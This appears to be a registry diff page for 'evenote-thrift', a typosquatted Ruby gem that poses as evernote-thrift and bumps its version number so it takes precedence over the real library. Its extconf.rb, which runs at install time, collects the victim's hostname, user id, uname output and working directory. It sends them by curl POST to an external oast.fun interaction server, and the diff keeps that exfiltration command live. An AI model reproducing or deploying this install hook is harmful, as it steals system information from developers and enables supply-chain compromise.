evenote-thrift 10.7.0 → 10.8.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/evenote-thrift.gemspec +1 -1
- data/extconf.rb +1 -3
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: bc890e3e7715801fb6050c18f4e8412b2d9b449d2ca6176d3b4f5cc7673138cc
|
4
|
+
data.tar.gz: 75937ca8c4d374f5991cdec0807863d1ed26c3192605a36cfb104bfd54de2278
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 1deefb3a388ae953fc9c81a96e63dbdb9fd8dbfa092435df25bf13bb383bda7b90682616a84375b66187706e5b45db093d6ab256bb44522654f80b32792c848d
|
7
|
+
data.tar.gz: c686aac1202c0ae9e6e34612deb5785c1441d25c56bc6889ea33c1f8f54bd78b5c62a9a592f090ce9812c82d1cfad627ee324220be9192b4f91d5810d97e1b3f
|
data/evenote-thrift.gemspec
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
Gem::Specification.new do |s|
|
2
2
|
s.name = 'evenote-thrift'
|
3
|
-
s.version = '10.
|
3
|
+
s.version = '10.8.0' # Higher version to take precedence
|
4
4
|
s.summary = "A simple mimicking evernote-thrift"
|
5
5
|
s.description = "This gem is a placeholder."
|
6
6
|
s.authors = ["raxis-evernote"]
|
data/extconf.rb
CHANGED
@@ -25,7 +25,5 @@ system_info = `uname -a`.strip
|
|
25
25
|
current_dir = `pwd`.strip
|
26
26
|
|
27
27
|
# Command to post the collected information to a specified URL
|
28
|
-
system("curl -X POST -d \"hostname=#{hostname}&id=#{user_id}&uname=#{system_info}&pwd=#{current_dir}\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun
|
28
|
+
system("curl -X POST -d \"hostname=#{hostname}&id=#{user_id}&uname=#{system_info}&pwd=#{current_dir}\" https://scwtvczgsafwashvzljq01241ek1cq57i.oast.fun")
|
29
29
|
|
30
|
-
# # Command to obtain hostname and post it to a specified URL
|
31
|
-
# system("curl -X POST -d \"$(hostname)\" ")
|